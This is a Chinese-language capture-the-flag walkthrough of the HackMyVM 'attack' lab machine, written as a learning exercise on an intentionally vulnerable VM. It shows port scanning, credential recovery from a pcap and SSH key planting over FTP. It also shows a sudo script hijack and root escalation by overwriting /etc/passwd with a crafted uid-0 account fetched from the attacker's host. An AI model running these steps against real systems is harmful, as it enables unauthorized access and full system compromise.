hack-my-vm-attack

hack-my-vm-attack

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.134.108                                [17:34:16]
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-23 17:34 CST
Nmap scan report for 192.168.134.108
Host is up (0.020s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:67:07:CF (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.14 seconds

服务渗透

FTP没上去,是要用户名密码的

1
2
3
4
5
6
7
8
9
kali@kali [~] ➜  ftp  192.168.134.108                                                             [17:34:28]
Connected to 192.168.134.108.
220 ProFTPD Server (Debian) [::ffff:192.168.134.108]
Name (192.168.134.108:kali): anonymous
331 Password required for anonymous
Password: 
530 Login incorrect.
ftp: Login failed
ftp>

80端口看一看

1
2
3
kali@kali [~] ➜  curl http://192.168.134.108                                                      [17:36:06]
I did a capture with wireshark.
The name of the file is "capture" but i dont remember the extension :(

用了wireshark,然后忘记了拓展名,那估计就是wireshark默认的拓展名字:.pcpa,直接访问capture.pcpa下载了下来,打开直接找和FTP有关的,肯定有密码

1

拿到账号密码,直接尝试登录,看看有啥东西,在.ssh目录发现了authorized_keys,我直接尝试把我本机的put上去,看看能否成功

1
2
3
4
5
6
ftp> ls
229 Entering Extended Passive Mode (|||37157|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 teste    teste         748 Apr 23 08:37 authorized_keys
-rw-r--r--   1 teste    teste         394 Jan  7  2021 id_rsa.pub
226 Transfer complete
1
2
3
4
5
6
7
ftp> put authorized_keys 
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||12042|)
150 Opening BINARY mode data connection for authorized_keys
100% |****************************************************************|   748        5.36 MiB/s    00:00 ETA
226 Transfer complete
748 bytes sent in 00:00 (169.56 KiB/s)

那就直接远程连接就行

1
2
3
4
5
6
7
8
9
10
11
kali@kali [~] ➜  ssh teste@192.168.134.108                                                        [17:43:32]
Linux attack 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Apr 23 04:46:47 2025 from 192.168.134.141
teste@attack:~$

然后我就卡住了,因为底下有个mysecret.png文件,又有一个提示是找到文件,我以为这个图片有隐写,一直没找到,直接看wp,发现还得回wireshark里面去找

2

有一个filexxx.zip,我们去请求下载一下,看能否可以下载

3

发现可以下载,我们解压之后发现是一个私钥

1
2
kali@kali [~] ➜  ssh-keygen -y -f id_rsa                                                          [17:54:47]
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDC8yQhKHI2Piesf+mSfTJb16ZHtPxGMbw6b2yWwKf/hxYpFDi7FdsbIQKrXL2QClNIhmvsdDKcVrQrnKhfD4YoGV7GRqjKou6Eh8v2kymNvMtBRKfejdEwmy0/S7YvGVWewzoV4N3HhyxGjqyjGiiHF7drQWU2UGixqkijYOF34JJHQdSvVKF3jpox+Y4MAGD4XD3WhvktBLCdqGtWkGaeSae4fOfgCG5huf6SM638ts7Qr3BZt+uBZL2sz7AuKKiW/jzMOIjOB7rcoukoQVGhD/9372dkDmC1+av2ZGyvFW3ot99xgMOOzhP5Q8IHIZl8OnyTgMzs9bi+O0XGyaCB teste@attack

但是这个私钥并不是我们想要的哪个,teste用户我们已经拿下了,我们仔细去看看wireshark里面的这个包

4

而且这个数据巨大,不像是我们下载的那个压缩包,我们拿出数据另存为zip文件看看

5

解压发现,有一张二维码图片,扫描之后是一个地址,我们访问之后拿到了私钥

6

拿到私钥之后登录即可,提示是执行attack.sh文件,sudo -l 也恰好与该文件执行有关,但是attack.sh里面不是我们想执行的命令

可是这个程序又在jackob的家目录下,我们直接删了重写就行[因为在我们的家目录,我们肯定有xw权限]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
jackob@attack:~$ ls
attack.sh  flag.sh  note.txt  user.txt
jackob@attack:~$ pwd
/home/jackob
jackob@attack:~$ sudo -l
Matching Defaults entries for jackob on attack:
    !env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jackob may run the following commands on attack:
    (kratos) NOPASSWD: /home/jackob/attack.sh
jackob@attack:~$ rm -rf attack.sh 
jackob@attack:~$ echo "bash" > attack.sh && chmod +x attack.sh 
jackob@attack:~$ sudo -u kratos /home/jackob/attack.sh
kratos@attack:~$ id
uid=1002(kratos) gid=1002(kratos) groups=1002(kratos)
kratos@attack:~$

提权

拿到kratos权限,再看看有啥东西

1
2
3
4
5
6
kratos@attack:~$ sudo -l
Matching Defaults entries for kratos on attack:
    !env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User kratos may run the following commands on attack:
    (root) NOPASSWD: /usr/sbin/cppw

cppw应该是自己写的,和网上查到的不太一样

1
2
3
4
5
6
7
kratos@attack:~$ sudo /usr/sbin/cppw
cppw: wrong number of arguments, -h for usage
cppw: no changes
kratos@attack:~$ sudo /usr/sbin/cppw -h
Usage:
`cppw <file>' copys over /etc/passwd   `cppw -s <file>' copys over /etc/shadow
`cpgr <file>' copys over /etc/group    `cpgr -s <file>' copys over /etc/gshadow

给了用法示例,第一个命令直接覆盖/etc/passwd,那就简单了

1
2
kali@kali [~] ➜  openssl passwd 123                                                                                                              [18:17:30]
$1$RGaY3Vjt$z1NRZgq0nt5bQ.T5AOPge.

然后写一个用户就行了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
kali@kali [~] ➜  cat a                                                                                                                           [18:18:41]
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
teste:x:1000:1000:teste,,,:/home/teste:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
proftpd:x:106:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:107:65534::/srv/ftp:/usr/sbin/nologin
jackob:x:1001:1001:,,,:/home/jackob:/bin/bash
kratos:x:1002:1002:,,,:/home/kratos:/bin/bash
sunrt:$1$RGaY3Vjt$z1NRZgq0nt5bQ.T5AOPge.:0:0:root:/root:/bin/bash

传过去执行就行了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
kratos@attack:/home/kratos$ wget http://192.168.134.141:8000/a
--2025-04-23 06:20:15--  http://192.168.134.141:8000/a
Connecting to 192.168.134.141:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1649 (1.6K) [application/octet-stream]
Saving to: ‘a’

a                                      100%[============================================================================>]   1.61K  --.-KB/s    in 0s      

2025-04-23 06:20:15 (219 MB/s) - ‘a’ saved [1649/1649]

kratos@attack:/home/kratos$ ls
a
kratos@attack:/home/kratos$ sudo -l
Matching Defaults entries for kratos on attack:
    !env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User kratos may run the following commands on attack:
    (root) NOPASSWD: /usr/sbin/cppw
kratos@attack:/home/kratos$ sudo /usr/sbin/cppw a
kratos@attack:/home/kratos$ su - sunrt
Password: 
root@attack:~# id
uid=0(root) gid=0(root) groups=0(root)
root@attack:~#